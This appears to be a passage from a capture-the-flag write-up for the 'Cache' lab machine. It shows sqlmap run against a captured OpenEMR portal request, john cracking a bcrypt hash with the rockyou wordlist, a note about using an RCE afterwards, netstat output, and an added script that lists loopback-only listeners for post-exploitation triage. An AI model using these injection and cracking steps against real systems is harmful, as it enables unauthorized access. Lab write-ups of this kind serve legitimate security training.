===================================================================
ID   Response   Lines   Word   Chars   Payload
===================================================================
sqlmap -r sql.txt
[14:33:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0
sudo john -w=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:00 DONE (2020-05-24 05:13) 3.333g/s 2820p/s 2820c/s 2820C/s tristan..princesita
Use the "--show" option to display all of the cracked passwords reliably
Session completed
With the cracked password you can then log in to openEMR and use the RCE described earlier.
sql.txt

GET /portal/find_appt_popup_user.php?catid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=4ebpe344qk9vhcjgk2nesv54gv; PHPSESSID=qeiik41c06okaktjdpebot7n05
Upgrade-Insecure-Requests: 1
DNT: 1
Cache-Control: max-age=0
ash@cache:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
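The netstat listing above is worth reading with one question in mind: which listeners are bound to loopback only and therefore never appeared in the external port scan? On this box that is 3306 (MySQL) and 11211 (memcached's default port), plus the local stub resolver on 53; 22 and 80 are the only externally reachable services. The following helper is an added example, not part of the original write-up, that automates that triage over a netstat -tulpn listing. The sample input is constructed from the output shown above; the function name local_only_listeners is my own.

```shell
#!/bin/sh
# Constructed sample: the `netstat -tulpn` listing from the ash@cache shell above.
NETSTAT_SAMPLE='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -'

# local_only_listeners NETSTAT_OUTPUT
# Prints "<proto> <port>" for every tcp/udp socket whose local address is a
# loopback address (127.x.x.x or ::1). Those services are invisible to an
# external scan, so after getting a shell they are the ones to revisit
# (connect locally, or forward the port back to the attacking host).
local_only_listeners() {
    printf '%s\n' "$1" | awk '
        # Only socket lines: the first field is tcp, tcp6, udp or udp6.
        $1 ~ /^(tcp|udp)6?$/ {
            addr = $4
            # The port is everything after the last ":"; the host is the rest.
            # This also handles IPv6 forms such as ":::22" (host becomes "::").
            n    = split(addr, parts, ":")
            port = parts[n]
            host = substr(addr, 1, length(addr) - length(port) - 1)
            if (host ~ /^127\./ || host == "::1") print $1, port
        }'
}

# Usage on the sample; on a live host run: local_only_listeners "$(netstat -tulpn 2>/dev/null)"
local_only_listeners "$NETSTAT_SAMPLE"
```

Against the sample this prints tcp 53, tcp 3306, tcp 11211 and udp 53, and nothing for 22 or 80, which matches the manual reading of the listing: the database and the cache are the next things to poke at from the ash shell.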